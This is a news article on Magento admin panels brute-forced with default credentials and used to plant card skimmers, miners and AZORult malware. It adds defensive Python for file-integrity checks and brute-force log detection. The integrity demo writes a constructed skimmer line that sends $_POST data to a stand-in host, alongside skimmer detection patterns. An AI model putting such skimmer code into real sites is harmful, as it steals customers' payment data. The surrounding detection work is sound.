Hacked Magento Sites Steal Card Data, Spread Malware

Cybercriminals are targeting websites running the Magento e-commerce platform, injecting code that steals payment card data and infects visitors with malware, Flashpoint reports.

The open-source platform, written in PHP, has long attracted threat actors because of its popularity among e-commerce sites. According to Flashpoint, members of both entry-level and top-tier Deep & Dark Web forums have shown continued interest in Magento since 2016, and have also targeted other content management systems such as Powerfront CMS and OpenCart.

In the newly observed attacks, the intruders brute-force Magento administration panels. Once they gain access, they install malware that scrapes payment card numbers, along with cryptocurrency miners.

At least 1,000 Magento admin panels have been compromised, Flashpoint says. The attackers log in using common and well-known default Magento credentials, so no software vulnerability is needed: changing the default credentials at installation time would have prevented these intrusions, and rate limiting or account lockout on the admin login would further blunt brute-force attempts.

With control of the site's Magento admin panel, the attackers have unfettered access to the site and can inject any script they want. In this case, they injected malicious code into a Magento core file that runs on the pages where payment data is processed. That code intercepts the POST requests carrying the customer's card details as they reach the server and forwards a copy to the attacker.
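The defensive counterpart of that injection is to know when a core file has changed and what was put into it. The following Python script is an added example, not code from the article or from Flashpoint's research: it records a SHA-256 baseline of every file under a Magento install, reports files that were later modified or added, and scans those files for patterns typical of a server-side skimmer, such as reading `$_POST` and shipping it to an external URL. The directory layout, the file name `app/code/core/Example/PaymentController.php`, the host `evil.invalid` and the appended skimmer-style line are all constructed for the demo.

```python
import hashlib
import os
import re
import shutil
import tempfile

# Lines in a core PHP file that warrant a closer look: posted form data being
# read and sent to an external URL, or code hidden behind base64/eval.
SUSPICIOUS = [
    re.compile(r"\$_POST\b"),
    re.compile(r"\b(curl_init|file_get_contents|fsockopen)\s*\(\s*['\"]https?://"),
    re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\b"),
]

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(root):
    """Map relative path (forward slashes) -> SHA-256 for every file under root."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hashes[rel] = sha256_file(full)
    return hashes

def compare(root, known):
    """Diff the tree under root against a previously recorded baseline."""
    current = baseline(root)
    return {
        "modified": sorted(p for p in current if p in known and current[p] != known[p]),
        "added": sorted(p for p in current if p not in known),
        "removed": sorted(p for p in known if p not in current),
    }

def suspicious_lines(path):
    """Return (line_no, text) for every line matching a SUSPICIOUS pattern."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for no, line in enumerate(f, 1):
            if any(p.search(line) for p in SUSPICIOUS):
                hits.append((no, line.strip()))
    return hits

def demo():
    """Build a throwaway 'install', baseline it, inject a skimmer, and detect it."""
    root = tempfile.mkdtemp()
    try:
        rel = "app/code/core/Example/PaymentController.php"   # placeholder name
        target = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(target))
        with open(target, "w") as f:
            f.write("<?php\nclass Example_PaymentController {\n"
                    "    public function saveAction() {\n"
                    "        // legitimate order handling\n"
                    "    }\n}\n")
        known = baseline(root)   # what you would store right after a clean deploy

        # Constructed skimmer-style line appended to the file, mimicking the
        # kind of injection described above (evil.invalid is a reserved test host).
        with open(target, "a") as f:
            f.write("@file_get_contents('http://evil.invalid/c.php?d=' . "
                    "base64_encode(serialize($_POST)));\n")

        diff = compare(root, known)
        hits = {p: suspicious_lines(os.path.join(root, *p.split("/")))
                for p in diff["modified"] + diff["added"]}
        return diff, hits
    finally:
        shutil.rmtree(root)

if __name__ == "__main__":
    diff, hits = demo()
    print("modified:", diff["modified"])
    for path, lines in hits.items():
        for no, text in lines:
            print(f"  {path}:{no}: {text}")
```

In production the baseline would be generated from a clean checkout of the exact Magento release in use and stored off the web server, so an attacker with admin-panel access cannot simply regenerate it; the pattern list is a starting point, not a substitute for reviewing every flagged diff.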

The compromised sites also served visitors a fake Adobe Flash Player update prompt. If launched, the bogus update ran malicious JavaScript that downloaded the AZORult information stealer from GitHub; AZORult in turn downloaded the Rarog cryptocurrency miner.

The GitHub accounts hosting the malicious files have been active since 2017, and the researchers observed the attackers updating the files daily to evade signature- and behavior-based detection tools.

Most of the 1,000 compromised panels belong to organizations in the education and healthcare sectors in the United States and Europe. The researchers believe, however, that the sites they know of are only part of a larger population of infected Magento panels.

To protect their sites and users, Magento admins are advised to review CMS account logins and enforce strong password hygiene to reduce their exposure to brute-force attacks: prevent reuse of previously used passwords, enable two-factor authentication for sensitive systems and applications, and provide users with a secure password manager.
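The brute-force campaign described earlier and the advice above to review admin logins both come down to the same check: spotting many login attempts against the admin panel from one source. The following Python is an added example, not from the article or from Flashpoint: it parses web-server access logs in the common Apache/Nginx combined format and flags any client that POSTs to the admin login path at least a threshold number of times within a short window, along with the user agents it used. The sample log lines are constructed; the `/admin/` path (Magento's stock admin front name, to be replaced with the site's own if it was changed), the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Login paths to watch. "/admin/" is the stock Magento admin front name; if the
# site uses a custom one, list it here (assumption for this example).
ADMIN_LOGIN_PATHS = ("/admin/", "/index.php/admin/")
THRESHOLD = 5         # this many login POSTs from one client ...
WINDOW_SECONDS = 60   # ... inside this window is treated as brute-forcing

# Apache/Nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not from the article): 10.0.0.5 hammers the admin
# login from a scripted client, while 10.0.0.9 is an ordinary shopper who also
# logs in to the panel once, legitimately.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2018:10:00:01 +0000] "POST /admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.9 - - [03/Apr/2018:10:00:02 +0000] "GET /catalog/product/view/id/12/ HTTP/1.1" 200 22310 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2018:10:00:04 +0000] "POST /admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.5 - - [03/Apr/2018:10:00:07 +0000] "POST /admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.9 - - [03/Apr/2018:10:00:09 +0000] "POST /checkout/cart/add/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2018:10:00:10 +0000] "POST /admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.5 - - [03/Apr/2018:10:00:13 +0000] "POST /admin/ HTTP/1.1" 200 5120 "-" "python-requests/2.18.4"
10.0.0.5 - - [03/Apr/2018:10:00:16 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "python-requests/2.18.4"
10.0.0.9 - - [03/Apr/2018:10:05:00 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: {"attempts": n, "agents": [...]}} for every client that sent
    at least `threshold` login POSTs within some `window`-second span."""
    attempts = defaultdict(list)
    agents = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if not rec["path"].startswith(ADMIN_LOGIN_PATHS):
            continue
        attempts[rec["ip"]].append(rec["ts"])
        agents[rec["ip"]].add(rec["ua"])

    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            # slide the window so stamps[start..end] all lie within `window` seconds
            while (t - stamps[start]).total_seconds() > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {"attempts": len(stamps), "agents": sorted(agents[ip])}
                break
    return flagged

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['attempts']} admin login POSTs, user agents {info['agents']}")
```

The count is deliberately independent of the response status, because the status a failed Magento login produces depends on the version and theme; the burst of POSTs from one client is the signal. Feed it the real access log (behind a proxy, log and parse the X-Forwarded-For client address instead of the proxy's) and turn flagged clients into blocks or an alert.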

“The rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords,” Flashpoint notes.

Weak credentials in Internet of Things (IoT) devices have long been blamed for fueling botnets, but any system where password hygiene is not enforced is just as exposed as those devices. Even industrial control system (ICS) products ship with default credentials and could be affected.

Related: Compromised Credentials: The Primary Point of Attack for Data Breaches

Related: Cameras Top Source of IoT Attacks: Kaspersky


Ionut Arghire is an international correspondent for SecurityWeek.
